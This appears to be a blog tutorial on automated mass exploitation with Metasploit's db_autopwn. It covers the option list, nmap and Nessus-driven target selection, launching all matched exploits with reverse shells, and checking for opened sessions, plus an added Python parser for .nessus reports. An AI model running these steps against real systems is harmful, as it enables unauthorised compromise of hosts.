Basic Metasploit framework autopwn attack

Of course, you can also use a Backtrack 5 system directly, since all of the tools above are already integrated into it.

[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

The options we will use in this guide are “-p”, “-x” and “-e”. However, option “-r” is also quite useful, as a reverse shell has a higher chance of getting through a firewall once you have successfully exploited a host. You can also use “-q” if you don’t want to see all the module output during autopwn.

First we will look into using db_nmap.

You need to scan the host(s) for open ports so that autopwn knows which ports are open.

db_nmap -sV [IP]

Then you just execute autopwn:

db_autopwn -p -e

Now just watch as the exploits ‘flow’. When they finish you can check if any of the exploits succeeded by doing:

sessions -l

The other method, which I personally find more effective, is using Nessus to determine the target host's vulnerabilities beforehand. After a scan has finished, go to Reports, select the scan you just ran and click the “Download report” button. Save it as a .nessus file somewhere on your disk.

Then in msfconsole do:

db_import /path/to/.nessus

db_autopwn -x -e

Once again you will see the flow of exploits (unless you also specified the -q option). To check whether any of the exploits actually worked, once again do:

sessions -l
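To make concrete what db_import reads from the .nessus file and what the “-x” option keys on (vulnerability references such as CVE ids), here is an added example that is not part of the original post: a small parser for the Nessus v2 report format. The report text is a constructed sample in the NessusClientData_v2 layout, and the plugin ids and CVE numbers in it are placeholders, not real findings.

```python
# Added example (not from the original post): parse a Nessus v2 (.nessus)
# report into per-host findings. The XML below is a constructed sample in
# the NessusClientData_v2 layout; plugin ids and CVE ids are placeholders.
import xml.etree.ElementTree as ET

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.0.2.10">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="100001" pluginName="Example SMB finding" pluginFamily="Windows">
        <risk_factor>Critical</risk_factor>
        <cve>CVE-0000-0001</cve>
        <cve>CVE-0000-0002</cve>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="100002" pluginName="Host information" pluginFamily="General">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>"""


def parse_nessus(xml_text):
    """Return {host: [finding, ...]}; one finding per ReportItem element."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        findings[host.get("name")] = [
            {
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "plugin_id": item.get("pluginID"),
                "severity": int(item.get("severity", "0")),
                "cves": [c.text for c in item.findall("cve")],
            }
            for item in host.iter("ReportItem")
        ]
    return findings


def vulnerability_references(findings, min_severity=1):
    """CVE references per host, skipping informational (severity 0) items."""
    refs = {}
    for host, items in findings.items():
        cves = {c for i in items if i["severity"] >= min_severity for c in i["cves"]}
        if cves:
            refs[host] = sorted(cves)
    return refs
```

Informational plugins (severity 0) carry no CVE references, which is why only the severity-4 finding contributes to the per-host reference list.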

I will soon post about what can be done once the host has been exploited successfully and a guide on using the meterpreter session.